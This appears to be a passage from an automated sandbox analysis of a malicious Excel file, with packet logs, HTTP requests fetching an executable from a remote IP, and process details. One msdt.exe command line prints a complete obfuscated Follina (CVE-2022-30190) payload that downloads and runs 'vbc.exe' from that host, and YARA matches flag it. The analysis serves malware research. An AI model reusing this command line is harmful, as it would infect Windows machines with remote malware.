Jun 28, 2022 10:46:37.874979019 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.874984980 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.875004053 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.875010967 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.875029087 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.875039101 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.875055075 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.875080109 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.875080109 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.875104904 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.875129938 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.875166893 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.990305901 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990358114 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990386009 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990408897 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990433931 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990457058 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.990459919 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990483999 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990509033 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990520954 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.990533113 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990555048 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990556955 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
Jun 28, 2022 10:46:37.990578890 CEST | 80 | 49783 | 172.245.119.48 | 192.168.2.4
Jun 28, 2022 10:46:37.990602970 CEST | 49783 | 80 | 192.168.2.4 | 172.245.119.48
                                                                                                                                                          • 172.245.119.48
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49773 | 172.245.119.48 | 80 | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Jun 28, 2022 10:45:23.452174902 CEST | 1378 | OUT | GET /shipping_invc/document.html HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                          Host: 172.245.119.48
                                                                                                                                                          Connection: Keep-Alive
Jun 28, 2022 10:45:23.572532892 CEST | 1379 | IN | HTTP/1.1 200 OK
                                                                                                                                                          Date: Tue, 28 Jun 2022 08:45:23 GMT
                                                                                                                                                          Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
                                                                                                                                                          Last-Modified: Mon, 27 Jun 2022 11:16:27 GMT
                                                                                                                                                          ETag: "54ed-5e26c0d18ab3c"
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Content-Length: 21741
                                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Content-Type: text/html


Session ID: 1
Source IP: 192.168.2.4
Source Port: 49783
Destination IP: 172.245.119.48
Destination Port: 80
Process: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp: Jun 28, 2022 10:46:37.635595083 CEST
kBytes transferred: 11717
Direction: OUT
Data:
GET /870/vbc.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 172.245.119.48
Connection: Keep-Alive

Timestamp: Jun 28, 2022 10:46:37.757875919 CEST
kBytes transferred: 11719
Direction: IN
Data:
HTTP/1.1 200 OK
Date: Tue, 28 Jun 2022 08:46:37 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
Last-Modified: Tue, 28 Jun 2022 02:41:13 GMT
ETag: "6d600-5e278f84f0321"
Accept-Ranges: bytes
Content-Length: 448000
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdownload



Target ID: 0
Start time: 10:44:27
Start date: 28/06/2022
Path: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit): true
Commandline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Imagebase: 0x1130000
File size: 27110184 bytes
MD5 hash: 5D6638F2C8F8571C593999C58866007E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 13
Start time: 10:45:24
Start date: 28/06/2022
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\msdt.exe" ms-msdt:/id pcWdiAGNOsTIc -skiP FOrCE /PArAM "It_rEBrowSeforFILe=#AIT IT_LaunchMethod=ContextMenu IT_BrowseForFile=4yt$(IEx($(IEX('[SysTEm.TExt.eNCodIng]'+[CHar]58+[CHAr]58+'UTF8.GeTStRIng([SYstEm.cONveRT]'+[Char]58+[cHAR]58+'FROMBAsE64stRiNg('+[cHaR]34+'U1RvcC1wck9jZVNTIC1Gb3JDZSAtbkFtZSAnbXNkdCc7JFdaID0gYWRkLVR5cEUgLW1FbWJlcmRFZmluSXRJT04gJ1tEbGxJbXBvcnQoInVyTE1vTi5kbEwiLCBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIEtXTCxzdHJpbmcgcEssc3RyaW5nIGp0Ryx1aW50IEV3LEludFB0ciB6YmcpOycgLU5hbWUgIlFXYiIgLU5hTWVTUGFjZSBtcyAtUGFzc1RocnU7ICRXWjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE3Mi4yNDUuMTE5LjQ4Lzg3MC92YmMuZXhlIiwiJGVOdjpQVUJMSUNcdmJjLmV4ZSIsMCwwKTtzdEFyVC1zTGVFUCgzKTtyVW5kbEwzMi5lWEUgemlwZmxkci5kbGwsUm91dGVUaGVDYWxsICIkRW52OlBVQkxJQ1x2YmMuZXhlIjtTdG9QLVByb2NFU3MgLUZPcmNFIC1uYW1FICdzZGlhZ25ob3N0Jw=='+[cHAr]34+'))'))))ej/../../../../../../../../../../../../.Msi
Imagebase: 0x1210000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.511470035.0000000000820000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: 0000000D.00000002.511764004.0000000000828000.00000004.00000020.00020000.00000000.sdmp, Author: Nasreddine Bencherchali, Christian Burkard
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512140531.00000000009A0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: 0000000D.00000002.512279726.0000000000C80000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate

Target ID: 22
Start time: 10:46:00
Start date: 28/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\byhngmvt\byhngmvt.cmdline
Imagebase: 0x13d0000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Target ID: 23
Start time: 10:46:03
Start date: 28/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF139.tmp" "c:\Users\user\AppData\Local\Temp\byhngmvt\CSC32F0A3FBBAE2450F8C7268C7C3F4F6C.TMP"
Imagebase: 0xd50000
File size: 43176 bytes
MD5 hash: C09985AE74F0882F208D75DE27770DFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 24
Start time: 10:46:09
Start date: 28/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1fyof3jw\1fyof3jw.cmdline
Imagebase: 0x13d0000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

Target ID: 25
Start time: 10:46:12
Start date: 28/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES13B6.tmp" "c:\Users\user\AppData\Local\Temp\1fyof3jw\CSCCF40F4DDD1534C9CB221F9FD50B8FC59.TMP"
Imagebase: 0xd50000
File size: 43176 bytes
MD5 hash: C09985AE74F0882F208D75DE27770DFA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

Target ID: 28
Start time: 10:46:32
Start date: 28/06/2022
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1cq1zudv\1cq1zudv.cmdline
Imagebase: 0x13d0000
File size: 2170976 bytes
MD5 hash: 350C52F71BDED7B99668585C15D70EEA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Reputation: moderate

No disassembly